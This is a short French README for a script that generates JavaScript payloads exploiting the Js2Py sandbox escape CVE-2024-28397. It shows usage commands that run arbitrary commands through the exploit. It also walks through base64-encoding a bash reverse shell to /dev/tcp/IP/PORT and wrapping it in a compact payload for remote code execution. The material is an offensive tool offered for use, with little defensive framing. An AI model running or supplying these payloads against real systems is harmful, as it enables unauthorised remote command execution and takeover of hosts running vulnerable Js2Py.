
Génère des payloads JavaScript pour exploiter l'évasion de sandbox Js2Py CVE-2024-28397, permettant l'exécution de commandes à distance et des shells inversés via l'exposition des internes de Python.
Ce script génère une charge utile JavaScript pouvant être évaluée par Js2Py dans des environnements vulnérables où les internes de Python sont exposés via des wrappers d'objets.
Exécution de commande de base :
python3 cve-2024-28397.py -c "id"
Générer une charge utile compacte sur une seule ligne :
python3 cve-2024-28397.py -c "whoami" --compact
Générer la charge utile Base64 :
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Générer la charge utile Js2Py :
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Remplacez BASE64_OUTPUT par la chaîne Base64 générée lors de la première étape.